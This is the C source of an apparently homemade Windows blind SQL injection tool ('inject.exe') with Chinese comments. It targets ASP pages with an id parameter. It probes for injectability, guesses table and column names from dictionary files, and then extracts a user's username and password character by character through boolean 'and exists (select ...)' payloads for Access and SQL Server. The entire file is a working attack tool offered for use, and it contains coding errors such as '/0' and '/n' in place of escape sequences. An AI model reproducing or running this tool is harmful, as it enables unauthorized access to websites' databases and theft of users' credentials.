//4月20日修改,代码可能比较不规范,没加注释!
#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>
#pragma comment(lib, "wininet.lib")
typedef struct{ //字段的结构
char *name; //字段名
DWORD len; //值长度
char *dic; //字典
char *cs; //猜长度或值时所用的串
char *url;
char *table; //表名
int m;
int id;
}ITEM;
typedef struct{
ITEM uitem; //用户名 段
ITEM pitem;//密码 段
}PR;
char buffer[1024*1024];
char flag[30]; //页面错误标志
char *flagr="html"; //页面错误标志HTML
char *GeturlResponse(char *url) //获取页面信息
{
DWORD dwBytesRead=0;
memset(buffer,0,sizeof(buffer));
HINTERNET hNet=InternetOpen("Sql",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;
}
int Getflag(char *url,char *p1) //获取页面错误标志 一般出错页面上有/movie.asp等,这里用它做标志
{
int i;
char *p=strstr(url,".asp");
i=0;
while(*p!='/')
p--;
strcpy(p1,p);
while(p1[i++]!='p');
p1[i]='/0';
if(!p1)
{
printf("Get flag failed/n/n");
return 0;
}
printf("The flag is %s/n/n",p1);
return 1;
}
DWORD WINAPI CheckUrl(LPVOID p) //检查url是否可以被注入
{
ITEM u=*(ITEM *)p;
char urlt[1024];
wsprintf(urlt,"%s'",u.url);
printf("Geting the %s Response data....../n",urlt);
if(strstr(GeturlResponse(urlt),flag))
{
printf("This url could be injected!/n/n");//如果错误页面含错误标志,可注入
return 1;
}
else
{
printf("This url could not be injected!/n");
return 0;
}
return 0;
}
DWORD WINAPI Gettable(LPVOID p) //猜表名
{
ITEM t=*(ITEM *)p;
FILE *out;
char urlt[1024];
strcpy(urlt,t.url);
out = fopen("table.txt", "rt");
if(!out)
{
printf("can't open table dic!/n");
return 0;
}
//fseek(out,0, SEEK_SET);
while(!feof(out))
{
memset(t.table,0,sizeof(t.table));
fgets(t.table,100, out);
t.table[strlen(t.table)-1]='/0';
memset(urlt,0,sizeof(urlt));
wsprintf(urlt,"%s and exists (select * from %s)",t.url,t.table);
puts(urlt);
if(!strstr(GeturlResponse(urlt),flag))
{
printf("/nWe get the table/nThe table name is %s/n/n",t.table);
return 1;
}
}
fclose(out);
return 0;
}
DWORD WINAPI GetItem(LPVOID p) //猜字段名
{
ITEM item=*(ITEM *)p;
FILE *out;
char urlt[1024];
strcpy(urlt,item.url);
out=fopen(item.dic, "rt");
if(!out)
{
printf("can't open %s dic!/n",item.dic);
return 0;
}
//fseek(out,0, SEEK_SET);
while(!feof(out))
{
memset(item.name,0,sizeof(item.name));
fgets(item.name,30, out);
item.name[strlen(item.name)-1]='/0';
memset(urlt,0,sizeof(urlt));
wsprintf(urlt,"%s and exists (select %s from %s)",item.url,item.name,item.table);
puts(urlt);
if(!strstr(GeturlResponse(urlt),flag))
{
printf("/nWe get the item/nThe item(username) is %s/n/n",item.name);
return 1;
}
}
fclose(out);
return 0;
}
DWORD WINAPI GetResult(LPVOID p) //猜字段长度和字段值
{
ITEM up=*(ITEM *)p;
char *urlt;
int m,mn;
m=1;
while(1)
{
urlt=(char *)malloc(1024);
wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d and %s<%d)",
up.url,up.table,up.id,up.cs,m,up.cs,up.m);
puts(urlt);
if(strstr(GeturlResponse(urlt),flag))
{
printf("We can't get the %s/n",up.cs);
return 0;
}
else
{
mn=(m+(up.m))/2;
urlt=(char *)malloc(1024*2);
wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s=%d)",up.url,up.table,up.id,up.cs,mn);
puts(urlt);
if(!strstr(GeturlResponse(urlt),flag)&&strstr(GeturlResponse(urlt),flagr))
{
printf("The %s %s is %d/n/n",up.name,up.cs,mn);
return mn;
}
urlt=(char *)malloc(1024*2);
wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d)",up.url,up.table,up.id,up.cs,mn);
puts(urlt);
if(strstr(GeturlResponse(urlt),flag)||!strstr(GeturlResponse(urlt),flagr))
up.m=mn;
else
m=mn;
}
}
return 0;
}
DWORD WINAPI GetMinId(LPVOID p)
{
ITEM ID=*(ITEM *)p;
int id;
id=1;
char *urlt;
while(id<8000)
{
urlt=(char *)malloc(1024);
wsprintf(urlt,"%s and exists (select id from %s where id=%d)",ID.url,ID.table,id);
puts(urlt);
if(strstr(GeturlResponse(urlt),flag)){id++;printf("%d/n",id);}
else
{
if(strstr(strlwr(GeturlResponse(urlt)),flagr))
{printf("The min id is %d/n",id);
return id;}
else id++;
}
}
return -1;
}
int main(int argc,char **argv)
{
if(argc<2)
{
printf("Useage:inject.exe http://www.xxx.net/movie.asp?id=1 userid(a number)/n");
printf("example:inject.exe http://www.xxx.net/movie.asp?id=1 1/n");
printf(" if userid is 1,then you will get the username and password /n/twhose id is 1./n");
printf(" If you don't give userid ,the id will be the minist id./n");
return 0;
}
PR p;
DWORD threadId,exitid;
DWORD uexit,pexit;
HANDLE hThrd1[40],hThrd2[40];
int type;
char *ptr,*url,*urlt;
url=argv[1];
urlt=(char *)malloc(80);
wsprintf(urlt,"%s'",url);
if(ptr=strstr(GeturlResponse(urlt),"SQL")) //判断哪种类型的数据库
type=0; //sql
else
type=1;//access
p.uitem.table=(char *)malloc(20);
p.pitem.table=(char *)malloc(20);
p.uitem.name=(char *)malloc(30);
p.pitem.name=(char *)malloc(30);
p.uitem.dic=(char *)malloc(10);
p.pitem.dic=(char *)malloc(10);
p.uitem.cs=(char *)malloc(200);
p.pitem.cs=(char *)malloc(200);
p.uitem.url=url;
p.pitem.url=url;
p.uitem.dic="user.txt";
p.pitem.dic="pass.txt";
p.uitem.m=32;
p.pitem.m=32;
p.uitem.len=0;
p.pitem.len=0;
p.uitem.id=1;
p.pitem.id=1;
memset(flag,0,sizeof(flag));
Getflag(p.uitem.url,flag);
if(!flag)
{
printf("Can't get the flag/n/n");
return 0;
}
hThrd1[0]=CreateThread(NULL,0,CheckUrl,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0],&exitid);
CloseHandle(hThrd1[0]);
if(!exitid)
return 0;
hThrd1[0]=CreateThread(NULL,0,Gettable,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0], &exitid);
if(!exitid)
{
printf("Can't get the talbe name/n");
return 0;
}
strcpy(p.pitem.table,p.uitem.table);
hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0], &uexit);
if(!uexit)
printf("We can't get the user item/n");
hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.pitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0], &pexit);
if(!pexit)
printf("We can't get the pass item/n");
hThrd1[0]=CreateThread(NULL,0,GetMinId,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0],&exitid);
CloseHandle(hThrd1[0]);
p.uitem.id=exitid;
p.pitem.id=exitid;
printf("%d/n",argc);
if(argc>2)
{
if(argv[2])
{
if(atoi(argv[2])<p.uitem.id)
printf("The id you gived is less than min id or is not a number,/n/twe will use id as %d/n",p.uitem.id);
else
{
p.uitem.id=atoi(argv[2]);
p.pitem.id=atoi(argv[2]);
printf("We will guest the user whose id is %d/n",atoi(argv[2]));
}
}
}
if(exitid==-1)
{
printf("Get min id failed /n");
return 0;
}
wsprintf(p.uitem.cs,"len(%s)",p.uitem.name);
wsprintf(p.pitem.cs,"len(%s)",p.pitem.name);
if(uexit)
{
hThrd1[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[0],INFINITE);
GetExitCodeThread(hThrd1[0], &p.uitem.len);
}
if(pexit)
{
hThrd2[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
WaitForSingleObject(hThrd2[0],INFINITE);
GetExitCodeThread(hThrd2[0], &p.pitem.len);
}
printf("len(u) is %d/nlen(p) is %d/n/n",p.uitem.len,p.pitem.len);
p.uitem.m=128;
p.pitem.m=128;
DWORD pnum=0;
DWORD username[17];
DWORD password[17];
memset(username,0,sizeof(username));
memset(password,0,sizeof(password));
while(pnum<p.pitem.len||pnum<p.pitem.len)
{
p.uitem.cs=(char *)malloc(200);
p.pitem.cs=(char *)malloc(200);
if(type==1)
{
wsprintf(p.uitem.cs,"asc(mid(%s,%d,1))",p.uitem.name,pnum+1);
wsprintf(p.pitem.cs,"asc(mid(%s,%d,1))",p.pitem.name,pnum+1);
}
else
{
wsprintf(p.uitem.cs,"unicode(substring(%s,%d,1))",p.uitem.name,pnum+1);
wsprintf(p.pitem.cs,"unicode(substring(%s,%d,1))",p.pitem.name,pnum+1);
}
if(pnum<p.uitem.len&&uexit)
{
hThrd1[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
WaitForSingleObject(hThrd1[pnum],INFINITE);
GetExitCodeThread(hThrd1[pnum],&username[pnum]);
CloseHandle(hThrd1[pnum]);
}
if(pnum<p.pitem.len&&pexit)
{
hThrd2[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
WaitForSingleObject(hThrd2[pnum],INFINITE);
GetExitCodeThread(hThrd2[pnum],&password[pnum]);
CloseHandle(hThrd2[pnum]);
}
pnum++;
}
if(!uexit)
printf("We can't get username/n");
else
{
printf("/nusername is:",p.uitem.len);
for(pnum=0;pnum<p.uitem.len;pnum++)
printf("%c",username[pnum]);
printf("/n");
}
if(!pexit)
printf("We can't get password/n");
else
{
printf("/npassword is:",p.pitem.len);
for(pnum=0;pnum<p.pitem.len;pnum++)
printf("%c",password[pnum]);
}
printf("/nGet ret ok!/n");
return 1;
}